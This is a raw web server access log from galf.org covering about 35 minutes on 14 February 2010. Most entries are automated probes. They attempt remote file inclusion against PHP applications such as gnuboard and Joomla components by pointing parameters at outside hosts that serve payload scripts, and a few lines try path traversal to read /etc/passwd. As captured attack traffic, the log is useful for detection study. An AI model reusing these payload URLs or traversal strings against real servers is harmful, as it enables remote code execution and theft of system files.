210.205.6.233 - - [14/Feb/2010:21:44:37 -0800] "GET /logs/access.log%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.84.226 - - [14/Feb/2010:21:45:13 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [14/Feb/2010:21:45:13 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [14/Feb/2010:21:45:13 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [14/Feb/2010:21:45:27 -0800] "GET /logs/access.log%20%20//mcf.php?content=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [14/Feb/2010:21:45:27 -0800] "GET /mcf.php?content=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [14/Feb/2010:21:45:27 -0800] "GET /logs//mcf.php?content=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [14/Feb/2010:21:46:29 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [14/Feb/2010:21:46:36 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [14/Feb/2010:21:46:36 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [14/Feb/2010:21:46:36 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.241.31 - - [14/Feb/2010:21:46:51 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.241.31 - - [14/Feb/2010:21:46:51 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.241.31 - - [14/Feb/2010:21:46:51 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:21:47:44 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:21:47:44 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:21:47:44 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:21:48:27 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:21:48:27 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:21:48:27 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:21:49:39 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [14/Feb/2010:21:51:11 -0800] "GET /logs/access_100111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [14/Feb/2010:21:51:11 -0800] "GET /logs/access_100111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:21:51:18 -0800] "GET /logs/access_100111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:21:52:05 -0800] "GET /logs/access.log%20%20//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:21:52:05 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:21:52:05 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [14/Feb/2010:21:52:30 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:21:52:37 -0800] "GET /logs/access_100111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:21:52:46 -0800] "GET /logs/access.log%20%20//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:21:52:46 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:21:52:46 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [14/Feb/2010:21:52:57 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [14/Feb/2010:21:53:13 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.216.132 - - [14/Feb/2010:21:55:16 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.216.132 - - [14/Feb/2010:21:55:17 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.216.132 - - [14/Feb/2010:21:55:17 -0800] "GET /logs/access.log%20%20//bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.241.31 - - [14/Feb/2010:21:55:43 -0800] "GET /logs/access_100111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.216.132 - - [14/Feb/2010:21:56:14 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.216.132 - - [14/Feb/2010:21:56:14 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.61.244.6 - - [14/Feb/2010:21:56:18 -0800] "GET /logs/access_100118.log//index.php?DOCUMENT_ROOT=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.galf.org"
209.61.244.6 - - [14/Feb/2010:21:56:18 -0800] "GET /index.php?DOCUMENT_ROOT=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.galf.org"
209.61.244.6 - - [14/Feb/2010:21:56:18 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.galf.org"
87.106.241.31 - - [14/Feb/2010:21:56:58 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:21:57:05 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:21:57:05 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:21:57:05 -0800] "GET /logs/access_090720.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:21:57:14 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
204.12.11.202 - - [14/Feb/2010:21:57:19 -0800] "GET /logs/access_091123.log//mcf.php?content=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:21:57:31 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:21:57:31 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:21:57:31 -0800] "GET /logs/access_090720.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [14/Feb/2010:21:57:48 -0800] "GET /logs/access_091012.log//mcf.php?content=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.216.132 - - [14/Feb/2010:21:58:20 -0800] "GET /logs/access.log%20%20//bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:21:59:11 -0800] "GET /logs/access_090907.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:00:07 -0800] "GET /logs/access_090907.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:02:00 -0800] "GET /logs/access_091207.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:02:00 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:02:00 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.216.132 - - [14/Feb/2010:22:02:57 -0800] "GET /logs/access_100125.log%20%20//bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.250.198 - - [14/Feb/2010:22:03:18 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.250.198 - - [14/Feb/2010:22:03:18 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.250.198 - - [14/Feb/2010:22:03:18 -0800] "GET /logs/access.log%20%20//bbs//delete_comment.php?board_skin_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.105 - - [14/Feb/2010:22:03:38 -0800] "GET /logs/access_090914.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
210.127.209.105 - - [14/Feb/2010:22:03:38 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
210.127.209.105 - - [14/Feb/2010:22:03:39 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
77.88.25.28 - - [14/Feb/2010:22:04:05 -0800] "GET /logs/access_091228.log HTTP/1.1" 200 6435147 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:05:08 -0800] "GET /logs/access_091116.log//administrator/index.php?page=store.shipping_module_form&shipping_module=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:05:08 -0800] "GET /administrator/index.php?page=store.shipping_module_form&shipping_module=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:05:08 -0800] "GET /logs//administrator/index.php?page=store.shipping_module_form&shipping_module=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:05:28 -0800] "GET /logs/access_091207.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:05:38 -0800] "GET /logs/access_091207.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.216.132 - - [14/Feb/2010:22:05:55 -0800] "GET /logs/access_100125.log%20%20//bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:06:05 -0800] "GET /logs/access_090907.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:06:40 -0800] "GET /logs/access_090713.log//administrator/index.php?page=store.shipping_module_form&shipping_module=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:07:10 -0800] "GET /logs/access_090907.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:07:13 -0800] "GET /logs/access_091207.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.61.244.6 - - [14/Feb/2010:22:08:45 -0800] "GET /logs/access_100125.log//index.php?DOCUMENT_ROOT=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:22:09:14 -0800] "GET /logs/index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:22:09:14 -0800] "GET /index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:22:09:14 -0800] "GET /logs/access_090720.log/index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:22:10:44 -0800] "GET /logs/access_090720.log/index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:22:10:44 -0800] "GET /logs/index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:22:10:47 -0800] "GET /index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.112.161 - - [14/Feb/2010:22:11:14 -0800] "GET /logs/?N=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:22:11:54 -0800] "GET /index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:22:11:54 -0800] "GET /logs/access_090720.log/index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:22:12:07 -0800] "GET /logs/index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:22:15:59 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:22:15:59 -0800] "GET /logs/access_100118.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:22:15:59 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:22:16:01 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:22:16:01 -0800] "GET /logs/access_100118.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:22:16:01 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
208.80.193.32 - - [14/Feb/2010:22:16:19 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=69&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; DigExt; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:22:16:37 -0800] "GET /logs/access_090928.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:22:16:39 -0800] "GET /logs/access_090928.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:17:31 -0800] "GET /logs/access_090720.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.112.161 - - [14/Feb/2010:22:17:51 -0800] "GET /cendoc/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:22:19:36 -0800] "GET /logs/access.log%20%20///bbs/delete_all?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:22:19:36 -0800] "GET //bbs/delete_all?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:22:19:36 -0800] "GET /logs///bbs/delete_all?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.13.69.245 - - [14/Feb/2010:22:19:59 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:22:19:59 -0800] "GET /logs/access_090921.log/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:22:19:59 -0800] "GET /playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:22:20:08 -0800] "GET /playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:22:20:08 -0800] "GET /logs/access_090921.log/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:22:20:08 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:22:20:10 -0800] "GET /playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:22:20:10 -0800] "GET /logs/access_090921.log%20%20/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:22:20:10 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:22:20:11 -0800] "GET /playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:22:20:11 -0800] "GET /logs/access_090921.log%20%20/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:22:20:11 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:22:20:13 -0800] "GET /logs///bbs/delete_all?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:22:20:14 -0800] "GET //bbs/delete_all?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:22:20:14 -0800] "GET /logs/access.log%20%20///bbs/delete_all?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [14/Feb/2010:22:20:24 -0800] "GET /logs/access_100118.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
